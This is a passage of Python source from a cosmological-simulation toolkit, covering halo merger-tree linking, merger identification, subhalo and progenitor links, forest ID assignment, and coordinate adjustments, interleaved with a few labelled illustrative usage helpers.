maindescensnap=numsnaps-1-int((maindescen-maindescen%TEMPORALHALOIDVAL)/TEMPORALHALOIDVAL)
else:
maindescensnap=int((maindescen-maindescen%TEMPORALHALOIDVAL)/TEMPORALHALOIDVAL)
#increase the number of progenitors of this descendant
halodata[halosnap]['Head'][haloindex]=maindescen
halodata[halosnap]['HeadSnap'][haloindex]=maindescensnap
halodata[maindescensnap]['Num_progen'][maindescenindex]+=1
#store the root head
roothead=halodata[maindescensnap]['RootHead'][maindescenindex]
rootsnap=halodata[maindescensnap]['RootHeadSnap'][maindescenindex]
#now set the root head for all the progenitors of this object
while (True):
halodata[halosnap]['RootHead'][haloindex]=roothead
halodata[halosnap]['RootHeadSnap'][haloindex]=rootsnap
if (haloid==halodata[halosnap]['Tail'][haloindex]):
break
haloid=halodata[halosnap]['Tail'][haloindex]
halosnap=halodata[halosnap]['TailSnap'][haloindex]
haloindex=int(haloid%TEMPORALHALOIDVAL)-1
print("Done building", time.clock()-totstart)
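#Hedged usage sketch (not from the original file): after BuildTemporalHeadTailDescendant has
#filled Head/HeadSnap, a halo's future main branch can be followed forward in time until the
#root head (an object that is its own head) is reached.
def _example_walk_to_root_head(halodata, haloid, halosnap, TEMPORALHALOIDVAL=1000000000000):
    """Illustrative: return the chain of (snapshot, ID) pairs from a halo up to its root head."""
    chain = [(halosnap, haloid)]
    haloindex = int(haloid % TEMPORALHALOIDVAL) - 1
    while (halodata[halosnap]['Head'][haloindex] != haloid):
        headid = halodata[halosnap]['Head'][haloindex]
        headsnap = halodata[halosnap]['HeadSnap'][haloindex]
        haloid, halosnap = headid, headsnap
        haloindex = int(haloid % TEMPORALHALOIDVAL) - 1
        chain.append((halosnap, haloid))
    return chain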
def GetProgenLength(halodata,haloindex,halosnap,haloid,atime,TEMPORALHALOIDVAL,endreftime=-1):
"""
    Get the length (number of snapshots) of a halo's main progenitor branch
"""
proglen=1
progid=halodata[halosnap]["Tail"][haloindex]
progsnap=halodata[halosnap]["TailSnap"][haloindex]
progindex=int(progid%TEMPORALHALOIDVAL-1)
while (progid!=haloid):
if (atime[progsnap]<=endreftime):break
proglen+=1
haloid=progid
halosnap=progsnap
haloindex=progindex
progid=halodata[halosnap]["Tail"][haloindex]
progsnap=halodata[halosnap]["TailSnap"][haloindex]
progindex=int(progid%TEMPORALHALOIDVAL-1)
return proglen
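#Hedged usage sketch (assumed inputs, not from the original file): once Tail/TailSnap exist
#(e.g. after BuildTemporalHeadTail), GetProgenLength can measure how many snapshots each
#halo's main progenitor branch spans; snap=0 assumes catalogs stored with late times first.
def _example_branch_lengths(halodata, numhalos, atime, snap=0, TEMPORALHALOIDVAL=1000000000000):
    """Illustrative: main-branch length of every halo at a given snapshot."""
    lengths = np.zeros(numhalos[snap], dtype=np.int32)
    for ihalo in range(numhalos[snap]):
        lengths[ihalo] = GetProgenLength(halodata, ihalo, snap, halodata[snap]['ID'][ihalo],
                                         atime, TEMPORALHALOIDVAL)
    return lengths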
def IdentifyMergers(numsnaps,tree,numhalos,halodata,boxsize,hval,atime,MERGERMLIM=0.1,RADINFAC=1.2,RADOUTFAC=1.5,NPARTCUT=100, TEMPORALHALOIDVAL=1000000000000, iverbose=1,pos_tree=[]):
"""
Using head/tail info in halodata dictionary identify mergers based on distance and mass ratios
#todo still testing
"""
for j in range(numsnaps):
#store id and snap and mass of last major merger and while we're at it, store number of major mergers
halodata[j]["LastMerger"]=np.ones(numhalos[j],dtype=np.int64)*-1
halodata[j]["LastMergerRatio"]=np.ones(numhalos[j],dtype=np.float64)*-1
halodata[j]["LastMergerSnap"]=np.zeros(numhalos[j],dtype=np.uint32)
halodata[j]["LastMergerDeltaSnap"]=np.zeros(numhalos[j],dtype=np.uint32)
#halodata[j]["NumMergers"]=np.zeros(numhalos[j],dtype=np.uint32)
#built KD tree to quickly search for near neighbours
if (len(pos_tree)==0):
pos=[[]for j in range(numsnaps)]
pos_tree=[[]for j in range(numsnaps)]
start=time.clock()
if (iverbose): print("tree build")
for j in range(numsnaps):
if (numhalos[j]>0):
boxval=boxsize*atime[j]/hval
pos[j]=np.transpose(np.asarray([halodata[j]["Xc"],halodata[j]["Yc"],halodata[j]["Zc"]]))
pos_tree[j]=spatial.cKDTree(pos[j],boxsize=boxval)
if (iverbose): print("done ",time.clock()-start)
#else assume tree has been passed
for j in range(numsnaps):
if (numhalos[j]==0): continue
#at snapshot look at all haloes that have not had a major merger set
#note that only care about objects with certain number of particles
partcutwdata=np.where(halodata[j]["npart"]>=NPARTCUT)
mergercut=np.where(halodata[j]["LastMergerRatio"][partcutwdata]<0)
hids=np.asarray(halodata[j]["ID"][partcutwdata][mergercut],dtype=np.uint64)
start=time.clock()
if (iverbose):print("Processing ", len(hids))
if (len(hids)==0):continue
for hidval in hids:
#now for each object get the main progenitor
haloid=np.uint64(hidval)
haloindex=int(haloid%TEMPORALHALOIDVAL-1)
halosnap=j
originalhaloid=haloid
progid=halodata[halosnap]["Tail"][haloindex]
progsnap=halodata[halosnap]["TailSnap"][haloindex]
progindex=int(progid%TEMPORALHALOIDVAL-1)
numprog=tree[halosnap]["Num_progen"][haloindex]
#if object has no progenitor set LastMergerRatio to 0 and LastMerger to 0
if (numprog==0):
halodata[halosnap]["LastMerger"][haloindex]=0
halodata[halosnap]["LastMergerRatio"][haloindex]=0
continue
#print "starting halos ",j, hidval
#halo has main branch which we can wander on
#while object is not its own progenitor move along tree to see how many major mergers it had across its history
while (True):
#now for each progenitor, lets find any nearby objects within a given mass/vmax interval
posval=[halodata[progsnap]["Xc"][progindex],halodata[progsnap]["Yc"][progindex],halodata[progsnap]["Zc"][progindex]]
radval=RADINFAC*halodata[progsnap]["R_200crit"][progindex]
#get neighbour list within RADINFAC sorted by mass with most massive first
NNlist=pos_tree[progsnap].query_ball_point(posval, radval)
NNlist=[NNlist[ij] for ij in np.argsort(halodata[progsnap]["Mass_tot"][NNlist])[::-1]]
#store boxval for periodic correction
boxval=boxsize*atime[progsnap]/hval
#now if list contains some objects, lets see if the velocity vectors are moving towards each other and mass/vmax ratios are okay
if (len(NNlist)>0):
for NN in NNlist:
if (NN!=progindex):
mratio=halodata[progsnap]["Mass_tot"][NN]/halodata[progsnap]["Mass_tot"][progindex]
vratio=halodata[progsnap]["Vmax"][NN]/halodata[progsnap]["Vmax"][progindex]
#merger ratio is for object being larger of the two involved in merger
if (mratio>MERGERMLIM and mratio<1.0):
posvalrel=[halodata[progsnap]["Xc"][progindex]-halodata[progsnap]["Xc"][NN],halodata[progsnap]["Yc"][progindex]-halodata[progsnap]["Yc"][NN],halodata[progsnap]["Zc"][progindex]-halodata[progsnap]["Zc"][NN]]
for ij in range(3):
if posvalrel[ij]<-0.5*boxval: posvalrel[ij]+=boxval
elif posvalrel[ij]>0.5*boxval: posvalrel[ij]-=boxval
velvalrel=[halodata[progsnap]["VXc"][progindex]-halodata[progsnap]["VXc"][NN],halodata[progsnap]["VYc"][progindex]-halodata[progsnap]["VYc"][NN],halodata[progsnap]["VZc"][progindex]-halodata[progsnap]["VZc"][NN]]
radvelval=np.dot(posvalrel,velvalrel)/np.linalg.norm(posvalrel)
if (radvelval<0):
                                    #merger is happening
                                    #print "merger happening ", progsnap, NN
                                    #question of whether one should move down the tree till the merger is no longer happening and define that as the start
                                    #this could also set the length of the merger
                                    #lets move along the tree of the infalling neighbour until the object is past some factor of the progenitor's virial radius
starthaloindex=progindex
starthaloid=progid
starthalosnap=progsnap
startmergerindex=NN
startmergerid=halodata[progsnap]["ID"][NN]
startmergersnap=progsnap
mergerstartindex=starthaloindex
mergerstartid=starthaloid
mergerstartsnap=starthalosnap
while (tree[starthalosnap]["Num_progen"][starthaloindex]>0 and tree[startmergersnap]["Num_progen"][startmergerindex]>0):
posvalrel=[halodata[starthalosnap]["Xc"][starthaloindex]-halodata[startmergersnap]["Xc"][startmergerindex],halodata[starthalosnap]["Yc"][starthaloindex]-halodata[startmergersnap]["Yc"][startmergerindex],halodata[starthalosnap]["Zc"][starthaloindex]-halodata[startmergersnap]["Zc"][startmergerindex]]
boxval=boxsize*atime[starthalosnap]/hval
for ij in range(3):
if posvalrel[ij]<-0.5*boxval: posvalrel[ij]+=boxval
elif posvalrel[ij]>0.5*boxval: posvalrel[ij]-=boxval
radval=np.linalg.norm(posvalrel)/halodata[starthalosnap]["R_200crit"][starthaloindex]
mratio=halodata[startmergersnap]["Mass_tot"][startmergerindex]/halodata[starthalosnap]["Mass_tot"][starthaloindex]
                                        #as we move back, if the halo is now outside the search radius or too small, stop the search and define this as the start of the merger
if (radval>RADOUTFAC or mratio<MERGERMLIM):
mergerstartindex=starthaloindex
mergerstartid=starthaloid
mergerstartsnap=starthalosnap
break
#move to next progenitors
nextidval=halodata[starthalosnap]["Tail"][starthaloindex]
nextsnapval=halodata[starthalosnap]["TailSnap"][starthaloindex]
nextindexval=int(nextidval%TEMPORALHALOIDVAL-1)
starthaloid=nextidval
starthalosnap=nextsnapval
starthaloindex=nextindexval
nextidval=halodata[startmergersnap]["Tail"][startmergerindex]
nextsnapval=halodata[startmergersnap]["TailSnap"][startmergerindex]
nextindexval=int(nextidval%TEMPORALHALOIDVAL-1)
startmergerid=nextidval
startmergersnap=nextsnapval
startmergerindex=nextindexval
#store timescale of merger
deltamergertime=(mergerstartsnap-progsnap)
#set this as the merger for all halos from this point onwards till reach head or halo with non-zero merger
merginghaloindex=mergerstartindex
merginghaloid=mergerstartid
merginghalosnap=mergerstartsnap
oldmerginghaloid=merginghaloid
#print "Merger found ",progsnap,mergerstartsnap, halodata[progsnap]["Mass_tot"][NN]/halodata[progsnap]["Mass_tot"][progindex],
#print halodata[startmergersnap]["Mass_tot"][startmergerindex]/halodata[starthalosnap]["Mass_tot"][starthaloindex]
                                    #now set merger time for all later haloes unless a new merger has happened
while (oldmerginghaloid!=halodata[progsnap]["RootHead"][progindex] and halodata[merginghalosnap]["LastMergerRatio"][merginghaloindex]<0):
halodata[merginghalosnap]["LastMerger"][merginghaloindex]=halodata[progsnap]["ID"][NN]
halodata[merginghalosnap]["LastMergerRatio"][merginghaloindex]=halodata[progsnap]["Mass_tot"][NN]/halodata[progsnap]["Mass_tot"][progindex]
halodata[merginghalosnap]["LastMergerSnap"][merginghaloindex]=progsnap
halodata[merginghalosnap]["LastMergerDeltaSnap"][merginghaloindex]=deltamergertime
oldmerginghaloid=merginghaloid
mergingnextid=halodata[merginghalosnap]["Head"][merginghaloindex]
mergingnextsnap=halodata[merginghalosnap]["HeadSnap"][merginghaloindex]
mergingnextindex=int(mergingnextid%TEMPORALHALOIDVAL-1)
merginghaloindex=mergingnextindex
merginghaloid=mergingnextid
merginghalosnap=mergingnextsnap
#move to next step
if (haloid==progid):
oldhaloid=haloid
currentsnap=halosnap
currentindex=haloindex
currentid=haloid
while (oldhaloid!=halodata[progsnap]["RootHead"][progindex] and halodata[currentsnap]["LastMergerRatio"][currentindex]<0):
halodata[currentsnap]["LastMerger"][currentindex]=0
halodata[currentsnap]["LastMergerRatio"][currentindex]=0
nextid=halodata[currentsnap]["Head"][currentindex]
nextsnap=halodata[currentsnap]["HeadSnap"][currentindex]
nextindex=int(nextid%TEMPORALHALOIDVAL-1)
oldhaloid=currentid
currentsnap=nextsnap
currentid=nextid
currentindex=nextindex
break
haloid=progid
haloindex=progindex
halosnap=progsnap
progid=halodata[halosnap]["Tail"][haloindex]
progsnap=halodata[halosnap]["TailSnap"][haloindex]
progindex=int(progid%TEMPORALHALOIDVAL-1)
numprog=tree[halosnap]["Num_progen"][haloindex]
#if at end of line then move up and set last major merger to 0
if (iverbose): print("Done snap",j,time.clock()-start)
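#Hedged usage sketch (not from the original file): once IdentifyMergers has been run, the
#LastMerger* fields can be queried directly; the 0.3 ratio threshold is an assumption chosen
#only for illustration.
def _example_major_merger_selection(halodata, snap, ratiolim=0.3):
    """Illustrative: indices of halos whose last recorded merger had a mass ratio above ratiolim."""
    return np.where(halodata[snap]["LastMergerRatio"] >= ratiolim)[0]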
def generate_sublinks(numhalos,halodata):
"""
generate sublinks for specific time slice
"""
if (numhalos==0):
return
halos=np.where(halodata['hostHaloID']==-1)[0]
for ihalo in halos:
haloid=halodata['ID'][ihalo]
halodata['PreviousSubhalo'][ihalo]=haloid
w=np.where((halodata["hostHaloID"]==haloid))[0]
if (len(w)>0):
halodata['NextSubhalo'][ihalo]=halodata['ID'][w[0]]
halodata['PreviousSubhalo'][w[0]]=halodata['ID'][w[0]]
for isub in range(len(w)-1):
subid=halodata['ID'][w[isub]]
nextsubid=halodata['ID'][w[isub+1]]
halodata['NextSubhalo'][w[isub]]=nextsubid
halodata['PreviousSubhalo'][w[isub+1]]=subid
halodata['NextSubhalo'][w[-1]]=halodata['ID'][w[-1]]
else:
halodata['NextSubhalo'][ihalo]=haloid
def GenerateSubhaloLinks(numsnaps,numhalos,halodata,TEMPORALHALOIDVAL=1000000000000, iverbose=0, iparallel=0):
"""
This code generates a quick way of moving across a halo's subhalo list
The code is passed
- the number of snapshots,
- an array of the number of haloes per snapshot,
- the halodata dictionary structure which must contain the halo merger tree based keys, Head, RootHead, etc, and mass, phase-space positions of haloes,
and other desired properties
"""
for j in range(numsnaps):
        #initialise the next/previous subhalo link arrays
halodata[j]["NextSubhalo"]=np.zeros(numhalos[j],dtype=np.int64)
halodata[j]["PreviousSubhalo"]=np.zeros(numhalos[j],dtype=np.int64)
#iterate over all host halos and set their subhalo links
start=time.clock()
nthreads=1
if (iparallel):
manager=mp.Manager()
nthreads=int(min(mp.cpu_count(),numsnaps))
print("Number of threads is ",nthreads)
for j in range(0,numsnaps,nthreads):
start2=time.clock()
if (iparallel):
activenthreads=nthreads
            if (numsnaps-j<activenthreads): activenthreads=numsnaps-j
processes=[mp.Process(target=generate_sublinks,args=(numhalos[j+k],halodata[j+k])) for k in range(activenthreads)]
for p in processes:
p.start()
for p in processes:
p.join()
if (iverbose): print("Done snaps",j,"to",j+nthreads,time.clock()-start2)
else:
generate_sublinks(numhalos[j],halodata[j])
if (iverbose): print("Done snap",j,time.clock()-start2)
print("Done subhalolinks ",time.clock()-start)
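#Hedged usage sketch (not part of the original code): once GenerateSubhaloLinks has filled
#NextSubhalo/PreviousSubhalo, the subhaloes of a host can be visited as a linked list that
#terminates when an object points back to itself.
def _example_iterate_subhalos(halodata_snap, hostindex, TEMPORALHALOIDVAL=1000000000000):
    """Illustrative: return the IDs of a host halo's subhaloes via the NextSubhalo links."""
    subids = []
    previd = halodata_snap['ID'][hostindex]
    curid = halodata_snap['NextSubhalo'][hostindex]
    while (curid != previd):
        subids.append(curid)
        previd = curid
        curindex = int(curid % TEMPORALHALOIDVAL) - 1
        curid = halodata_snap['NextSubhalo'][curindex]
    return subids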
def GenerateProgenitorLinks(numsnaps,numhalos,halodata,nsnapsearch=4,TEMPORALHALOIDVAL=1000000000000, iverbose=1):
"""
    This code generates a quick way of moving across a halo's progenitor list storing the next/previous progenitor
The code is passed
- the number of snapshots,
- an array of the number of haloes per snapshot,
- the halodata dictionary structure which must contain the halo merger tree based keys, Head, RootHead, etc, and mass, phase-space positions of haloes,
and other desired properties
"""
if (nsnapsearch>=numsnaps-1):
nsnapsearch=numsnaps-1
print("Warning, number of snaps < search size, reducing search size to numsnaps-1=",nsnapsearch)
for j in range(numsnaps):
        #initialise the next/previous progenitor link arrays
halodata[j]["NextProgenitor"]=np.ones(numhalos[j],dtype=np.int64)*-1
halodata[j]["PreviousProgenitor"]=np.ones(numhalos[j],dtype=np.int64)*-1
#move backward in time and identify all unique heads
start=time.clock()
for j in range(1,numsnaps):
start2=time.clock()
if (numhalos[j]==0): continue
#find all unique heads
heads=np.unique(np.array(np.int64(halodata[j]['Head'])))
#for these heads identify all halos with this head
for ihead in heads:
currenttails=deque()
            for k in range(j,min(j+nsnapsearch,numsnaps)):
w=np.where(halodata[k]['Head']==ihead)
if (len(w[0])>0):
currenttails.extend(np.nditer(np.int64(halodata[k]["ID"][w])))
if (len(currenttails)==0):
continue
haloid=currenttails[0]
haloindex=int(haloid%TEMPORALHALOIDVAL-1)
            halosnap=np.int64(numsnaps-1-(haloid-int(haloid%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
halodata[halosnap]['PreviousProgenitor'][haloindex]=np.int64(haloid)
for itail in range(len(currenttails)-1):
haloid=currenttails[itail]
haloindex=int(haloid%TEMPORALHALOIDVAL-1)
                halosnap=np.int64(numsnaps-1-(haloid-int(haloid%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
haloindex=int(currenttails[itail]%TEMPORALHALOIDVAL-1)
nexthaloid=currenttails[itail+1]
nexthaloindex=int(nexthaloid%TEMPORALHALOIDVAL-1)
nexthalosnap=np.int64(numsnaps-1-(nexthaloid-int(nexthaloid%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
halodata[halosnap]['NextProgenitor'][haloindex]=np.int64(nexthaloid)
halodata[nexthalosnap]['PreviousProgenitor'][nexthaloindex]=np.int64(haloid)
haloid=currenttails[-1]
haloindex=int(haloid%TEMPORALHALOIDVAL-1)
            halosnap=np.int64(numsnaps-1-(haloid-int(haloid%TEMPORALHALOIDVAL))/TEMPORALHALOIDVAL)
halodata[halosnap]['NextProgenitor'][haloindex]=haloid
if (iverbose): print("Done snap",j,time.clock()-start2)
print("Done progenitor links ",time.clock()-start)
def SetForestID(numsnaps,halodata,rootheadid,ForestID,AllRootHead,
TEMPORALHALOIDVAL = 1000000000000,searchSnapLim = 5, ireversesnaporder=True):
"""
Sets the forest id of halos using a roothead as a start point.
Given an initial root head and end snapshot,
First append the roothead to the AllRootHead list.
search all previous snapshots for any haloes that share the same roothead.
Also at each snapshot, find all subhaloes of all haloes sharing the same
root head
if the roothead of a subhalo is not present in the AllRootHead list
then recursively call SetForestID with this subhalo's root head as start point
if a subhalo's current host is not within the tree defined by rootheadid
then recursively call SetForestID with this host's root head as start point
Parameters
----------
numsnaps : numpy.int32
the number of snapshots
halodata : dict
the halodata dictionary structure which must contain the halo merger tree based keys (Head, RootHead), etc.
rootheadid : numpy.int64
the rootheadid of the tree that will be explored and have its forestID set
AllRootHead : list
a list that stores the current set of rootheadid values that have been searched
Optional Parameters
-------------------
TEMPORALHALOIDVAL : numpy.int64
Temporal ID value that makes Halo IDs temporally unique, adding a snapshot num* this value.
Allows one to quickly parse a Halo ID to determine the snapshot it exists at and its index.
searchSnapLim : numpy.int32
        Maximum number of snapshots to keep searching if no new halos are identified as belonging to
a rootheadid's tree, moving backwards in time
ireversesnaporder : bool
Whether dictionary data has late times starting at 0 (True, default) or at end of dictionary (False)
Returns
-------
AllRootHead : list
Updated list
halodata : dict
Updated halo data
"""
if (ireversesnaporder): endSnap = numsnaps-int(rootheadid/TEMPORALHALOIDVAL)-1
else : endSnap = int(rootheadid/TEMPORALHALOIDVAL)
rootheadindex=int(rootheadid%TEMPORALHALOIDVAL-1)
AllRootHead.append(rootheadid)
    #set the forest level of this root head (the seed of the search)
#if this object is a host at final snap then set the forest level to 0
#otherwise set the ForestLevel to 1
ForestLevel=1*(halodata[endSnap]["hostHaloID"][rootheadindex]!=-1)
    #Indicator for the number of snapshots searched
iSearchSnap = 0
#set the direction of how the data will be processed
if (ireversesnaporder): snaplist=np.arange(endSnap,numsnaps,dtype=np.int32)
    else : snaplist=np.arange(endSnap,-1,-1)
for snap in snaplist:
#Find which halos at this snapshot point to the RootDescedant
sel = np.where(halodata[snap]["RootHead"]==rootheadid)[0]
#keep track of how many snapshots there have been where there is nothing in the tree
if(sel.size==0):
iSearchSnap+=1
if(iSearchSnap==searchSnapLim): break
else: iSearchSnap = 0
# Set all the halos within this tree within this snapshot to this forest ID
halodata[snap]["ForestID"][sel] = ForestID
halodata[snap]["ForestLevel"][sel] = ForestLevel
#Lets find which halos are subhalos of the halos within the tree defined by
#halos with the same rootheadid
subHaloIndxs = np.where(np.in1d(halodata[snap]["hostHaloID"],halodata[snap]["ID"][sel]))[0]
#Lets loop over all the subhalos within this selection, which contains
#all subhalos of any host halos within the tree defined by rootheadid
for subHaloIndx in subHaloIndxs:
#See if this tree has already been set
if(halodata[snap]["RootHead"][subHaloIndx] not in AllRootHead):
#Lets walk the subhalo's tree setting the forest ID
AllRootHead,halodata = SetForestID(numsnaps,halodata,halodata[snap]["RootHead"][subHaloIndx],ForestID,AllRootHead)
#Extract the hosts of all subhalos in this selection that are not already in the tree defined by rootheadid
treeSubhaloSel = (halodata[snap]["hostHaloID"][sel]!=-1) & (np.invert(np.in1d(halodata[snap]["hostHaloID"][sel],halodata[snap]["ID"][sel])))
#Get the index of these hosts that lie outside the tree
hostIndxs = np.unique(halodata[snap]["hostHaloID"][sel][treeSubhaloSel]%TEMPORALHALOIDVAL-1).astype(int)
#Loop over all the index for the host halos
for hostIndx in hostIndxs:
#See if this tree has already been set
if(halodata[snap]["RootHead"][hostIndx] not in AllRootHead):
                #Lets walk the host's tree setting the forest ID
AllRootHead,halodata = SetForestID(numsnaps,halodata,halodata[snap]["RootHead"][hostIndx],ForestID,AllRootHead)
return AllRootHead,halodata
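#Hedged note (not from the original file): SetForestID recurses whenever it encounters a subhalo
#or host whose tree has not yet been visited, so deeply connected forests can exceed Python's
#default recursion limit; a caller may choose to raise that limit before building forests.
def _example_raise_recursion_limit(limit=100000):
    """Illustrative: increase the interpreter recursion limit before calling GenerateForest."""
    import sys
    sys.setrecursionlimit(limit)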
def GenerateForest(numsnaps,numhalos,halodata,atime,
TEMPORALHALOIDVAL=1000000000000, iverbose=1, interactiontime=2, ispatialintflag=False, pos_tree=[], cosmo=dict()):
"""
This code traces all root heads back in time identifying all interacting haloes and bundles them together into the same forest id
The idea is to have in the halodata dictionary an associated unique forest id for all related (sub)haloes. The code also allows
for some cleaning of the forest, specifically if a (sub)halo is only interacting for some small fraction of time, then it is not
assigned to the forest. This can limit the size of a forest, which could otherwise become the entire halo catalog.
Parameters
----------
numsnaps : numpy.int32
the number of snapshots
numhalos : array
array of the number of haloes per snapshot.
halodata : dict
the halodata dictionary structure which must contain the halo merger tree based keys (Head, RootHead), etc.
atime : array
an array of scale factors
Optional Parameters
-------------------
TEMPORALHALOIDVAL : numpy.int64
Temporal ID value that makes Halo IDs temporally unique, adding a snapshot num* this value.
Allows one to quickly parse a Halo ID to determine the snapshot it exists at and its index.
iverbose : int
verbosity of function (0, minimal, 1, verbose, 2 chatterbox)
interactiontime : int
Optional functionality not implemented yet. Allows forest to be split if connections do not span
more than this number of snapshots
ispatialintflag : bool
Flag indicating whether spatial information should be used to join forests. This requires cosmological information
pos_tree : scikit.spatial.cKDTree
Optional functionality not implemented yet. Allows forests to be joined if haloes
are spatially close.
cosmo : dict
dictionary which has cosmological information such as box size, hval, Omega_m
Returns
-------
ForestSize : numpy.array
Update the halodata dictionary with ForestID information and also returns the size of
the forests
"""
#initialize the dictionaries
for j in range(numsnaps):
        #initialise the forest id and forest level arrays
halodata[j]["ForestID"]=np.ones(numhalos[j],dtype=np.int64)*-1
halodata[j]["ForestLevel"]=np.ones(numhalos[j],dtype=np.int32)*-1
#built KD tree to quickly search for near neighbours. only build if not passed.
if (ispatialintflag):
start=time.clock()
boxsize=cosmo['BoxSize']
hval=cosmo['Hubble_param']
if (len(pos_tree)==0):
pos=[[]for j in range(numsnaps)]
pos_tree=[[]for j in range(numsnaps)]
start=time.clock()
if (iverbose): print("KD tree build")
for j in range(numsnaps):
if (numhalos[j]>0):
boxval=boxsize*atime[j]/hval
pos[j]=np.transpose(np.asarray([halodata[j]["Xc"],halodata[j]["Yc"],halodata[j]["Zc"]]))
pos_tree[j]=spatial.cKDTree(pos[j],boxsize=boxval)
if (iverbose): print("done ",time.clock()-start)
#now start marching backwards in time from root heads
    #identifying all subhaloes that have ever been subhaloes for long enough
#and all progenitors and group them together into the same forest id
forestidval=1
start=time.clock()
for j in range(numsnaps):
start2=time.clock()
if (numhalos[j]==0): continue
#now with tree start at last snapshot and identify all root heads
#only look at halos that are their own root head and are not subhalos
rootheads=np.where((halodata[j]['ID']==halodata[j]['RootHead'])*(halodata[j]['hostHaloID']==-1)*(halodata[j]['ForestID']==-1))
if (iverbose): print("At snapshot",j,len(rootheads[0]))
for iroothead in rootheads[0]:
#if a halo has been processed as part of a forest as a
#result of walking the subhalo branches of a different root head
#then move on to the next object
if (halodata[j]['ForestID'][iroothead]!=-1): continue
AllRootHead = []
            #begin recursively searching and setting the forest using the roothead
AllRootHead,halodata = SetForestID(numsnaps,halodata,halodata[j]["RootHead"][iroothead],forestidval,AllRootHead)
#update forest id
forestidval+=1
if (iverbose): print("Done snap",j,time.clock()-start2)
#get the size of each forest
    ForestSize=np.zeros(forestidval,dtype=np.int64)
for j in range(numsnaps):
if (numhalos[j]==0): continue
uniqueforest,counts=np.unique(halodata[j]['ForestID'],return_counts=True)
for icount in range(len(uniqueforest)):
ForestSize[uniqueforest[icount]-1]+=counts[icount]
if (iverbose): print("Finished processing forest size for snap",j)
start2=time.clock()
#first identify all subhalos and see if any have subhalo connections with different than their host
for j in range(numsnaps):
if (numhalos[j]==0): continue
#now with tree start at last snapshot and identify all root heads
#only look at halos that are their own root head and are not subhalos
missingforest=np.where((halodata[j]['ForestID']==-1))
rootheads=np.where((halodata[j]['ID']==halodata[j]['RootHead'])*(halodata[j]['ForestID']==-1))
subrootheads=np.where((halodata[j]['ForestID']==-1)*(halodata[j]['hostHaloID']!=-1))
if (iverbose): print("At snapshot",j," still have ",halodata[j]['ForestID'].size,len(missingforest[0]), " with no forest id ! Of which ",len(rootheads[0])," are root heads", len(subrootheads[0]),"are subhalos")
#if (iverbose and len(missingforest[0])>0): print("At snapshot",j," still have ",len(missingforest[0]), " with no forest id ! Of which ",len(rootheads[0])," are root heads", len(subrootheads[0]),"are subhalos")
if (len(subrootheads[0])>0):
for isub in subrootheads[0]:
hostid=halodata[j]['hostHaloID'][isub]
hostindex=int(hostid%TEMPORALHALOIDVAL-1)
halodata[j]['ForestID'][isub]=halodata[j]['ForestID'][hostindex]
halodata[j]['ForestLevel'][isub]=halodata[j]['ForestLevel'][hostindex]+1
#then return this
print("Done generating forest",time.clock()-start)
return ForestSize
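#Hedged usage sketch (assumed inputs, not from the original file): assign forest IDs once the
#temporal head/tail information has been built, then report the largest forest.
def _example_generate_forest(numsnaps, numhalos, halodata, atime):
    """Illustrative wrapper around GenerateForest."""
    forestsize = GenerateForest(numsnaps, numhalos, halodata, atime, iverbose=0)
    print("largest forest contains", forestsize.max(), "halos")
    return forestsize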
"""
Adjust halo catalog for period, comoving coords, etc
"""
def AdjustforPeriod(numsnaps,numhalos,boxsize,hval,atime,halodata,icomove=0):
"""
Map halo positions from 0 to box size
"""
for i in range(numsnaps):
if (icomove):
boxval=boxsize/hval
else:
boxval=boxsize*atime[i]/hval
wdata=np.where(halodata[i]["Xc"]<0)
halodata[i]["Xc"][wdata]+=boxval
wdata=np.where(halodata[i]["Yc"]<0)
halodata[i]["Yc"][wdata]+=boxval
wdata=np.where(halodata[i]["Zc"]<0)
halodata[i]["Zc"][wdata]+=boxval
wdata=np.where(halodata[i]["Xc"]>boxval)
halodata[i]["Xc"][wdata]-=boxval
wdata=np.where(halodata[i]["Yc"]>boxval)
halodata[i]["Yc"][wdata]-=boxval
wdata=np.where(halodata[i]["Zc"]>boxval)
halodata[i]["Zc"][wdata]-=boxval
def AdjustComove(itocomovefromphysnumsnaps,numsnaps,numhalos,atime,halodata,igas=0,istar=0):
"""
Convert distances to/from physical from/to comoving
"""
for i in range(numsnaps):
if (numhalos[i]==0): continue
#converting from physical to comoving
if (itocomovefromphysnumsnaps==1):
fac=float(1.0/atime[i])
#converting from comoving to physical
else:
fac=float(atime[i])
if (fac==1): continue
#convert physical distances
halodata[i]["Xc"]*=fac
halodata[i]["Yc"]*=fac
halodata[i]["Zc"]*=fac
halodata[i]["Xcmbp"]*=fac
halodata[i]["Ycmbp"]*=fac
halodata[i]["Zcmbp"]*=fac
#sizes
halodata[i]["Rvir"]*=fac
halodata[i]["R_size"]*=fac
halodata[i]["R_200mean"]*=fac
halodata[i]["R_200crit"]*=fac
halodata[i]["R_BN97"]*=fac
halodata[i]["Rmax"]*=fac
halodata[i]["R_HalfMass"]*=fac
#if gas
if (igas):
halodata[i]["Xc_gas"]*=fac
halodata[i]["Yc_gas"]*=fac
halodata[i]["Zc_gas"]*=fac
halodata[i]["R_HalfMass_gas"]*=fac
#if stars
if (istar):
halodata[i]["Xc_star"]*=fac
halodata[i]["Yc_star"]*=fac
halodata[i]["Zc_star"]*=fac
halodata[i]["R_HalfMass_star"]*=fac
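#Hedged usage sketch (not from the original file): the box size and Hubble parameter below are
#placeholder values; a real catalog would take them from its own cosmology.
def _example_adjust_catalog(numsnaps, numhalos, halodata, atime, boxsize=100.0, hval=0.7):
    """Illustrative: wrap positions into the (physical) box, then convert physical -> comoving."""
    AdjustforPeriod(numsnaps, numhalos, boxsize, hval, atime, halodata, icomove=0)
    AdjustComove(1, numsnaps, numhalos, atime, halodata, igas=0, istar=0)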
"""
Code to use individual snapshot files and merge them together into a full unified hdf file containing information determined from the tree
"""
def ProduceUnifiedTreeandHaloCatalog(fname,numsnaps,tree,numhalos,halodata,atime,
descripdata={'Title':'Tree and Halo catalog of sim', 'VELOCIraptor_version':1.15, 'Tree_version':1.1, 'Particle_num_threshold':20, 'Temporal_linking_length':1, 'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False},
cosmodata={'Omega_m':1.0, 'Omega_b':0., 'Omega_Lambda':0., 'Hubble_param':1.0,'BoxSize':1.0, 'Sigma8':1.0},
unitdata={'UnitLength_in_Mpc':1.0, 'UnitVelocity_in_kms':1.0,'UnitMass_in_Msol':1.0, 'Flag_physical_comoving':True,'Flag_hubble_flow':False},
partdata={'Flag_gas':False, 'Flag_star':False, 'Flag_bh':False},
